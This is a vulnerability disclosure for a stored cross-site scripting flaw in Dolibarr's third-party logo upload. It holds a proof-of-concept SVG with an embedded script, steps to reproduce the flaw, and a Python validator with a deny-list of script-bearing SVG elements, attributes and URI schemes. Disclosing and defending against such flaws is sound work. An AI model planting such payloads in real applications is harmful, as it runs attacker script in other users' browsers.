Cross-site Scripting (XSS) - Stored in Dolibarr/dolibarr

Valid
Reported on May 21st 2021

✍️ Description

Dolibarr is vulnerable to stored XSS: the third-party logo upload accepts SVG files containing JavaScript code, and the script runs when the stored logo is opened in the browser.

🕵️‍♂️ Proof of Concept

SVG file content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

  1. With an authenticated user, access http://localhost/societe/card.php?action=create&leftmenu=
  2. Write any content in the Third-party name field.
  3. Select any Prospect / Customer.
  4. Create an SVG file named poc.svg with the content above.
  5. In the Logo field, upload the SVG file created.
  6. Click on Create third party.
  7. Access the logo link.

PoC video: https://www.youtube.com/watch?v=rPP1Vs-GBco.
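The fix on the server side has two parts: refuse SVG uploads that carry active content, and serve stored logos in a way that keeps them from running as a script-capable document on the application's origin (step 7 above works because the logo link opens the file directly; an SVG embedded with an img tag does not run scripts). The following Python is an added example written for this report, not Dolibarr's own code (Dolibarr is PHP); the function names, the header set and the sample inputs are assumptions, and the sample inputs are constructed here from the SVG shown above plus a benign logo.

```python
# Added defensive example (not Dolibarr's own code): validate an uploaded SVG
# logo before accepting it, and build response headers that keep an SVG from
# running as a script-capable document on the application's origin.
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can run script or pull in foreign (HTML) content.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes whose value is a URI a browser may dereference (href / xlink:href).
URI_ATTRS = {"href", "{%s}href" % XLINK_NS}
# URI schemes that can execute script when dereferenced.
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|data)\s*:", re.IGNORECASE)


def _local_name(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return tag.rsplit("}", 1)[-1]


def svg_active_content(data: bytes) -> list[str]:
    """Return the reasons an uploaded SVG must be rejected (empty list = clean).

    Assumption: in production the parse should go through defusedxml or an
    equivalent hardened parser so entity-expansion tricks are refused too; the
    standard library parser is used here only to keep the example dependency-free.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    if _local_name(root.tag) != "svg":
        findings.append(f"root element is <{_local_name(root.tag)}>, not <svg>")

    for elem in root.iter():  # iter() walks the whole tree, root included
        name = _local_name(elem.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        for attr, value in elem.attrib.items():
            attr_name = _local_name(attr)
            # on* attributes (onload, onclick, ...) are inline event handlers.
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler attribute {attr_name} on <{name}>")
            if attr in URI_ATTRS and SCRIPT_SCHEME.match(value):
                findings.append(f"scriptable URI in {attr_name} on <{name}>")
    return findings


def logo_response_headers(filename: str) -> dict[str, str]:
    """Headers for serving a stored logo so that even a payload the validator
    missed cannot act on the application's origin: force a download and forbid
    script through CSP. The filename is normalised so a user-chosen name cannot
    inject header syntax."""
    safe_name = re.sub(r"[^\w.-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "X-Content-Type-Options": "nosniff",
    }


# Constructed sample inputs: the SVG from the report above and a benign logo.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(document.domain);
</script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="300" height="100">
<rect width="300" height="100" style="fill:rgb(0,0,255)" />
</svg>"""

if __name__ == "__main__":
    for label, svg in (("poc.svg", POC_SVG), ("logo.svg", BENIGN_SVG)):
        problems = svg_active_content(svg)
        print(label, "REJECT" if problems else "ACCEPT", problems)
```

Run as a script it rejects poc.svg with `forbidden element <script>` and accepts the benign logo. The validator is deliberately a deny-list on the elements and attribute patterns that execute script; for a stricter policy an allow-list of shape elements is the safer design, and the download headers remain worthwhile regardless, because they stop any SVG from rendering as a document on the Dolibarr origin.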

💥 Impact

Arbitrary JavaScript execution in the browser of any user who opens the uploaded logo, in the context of the Dolibarr origin.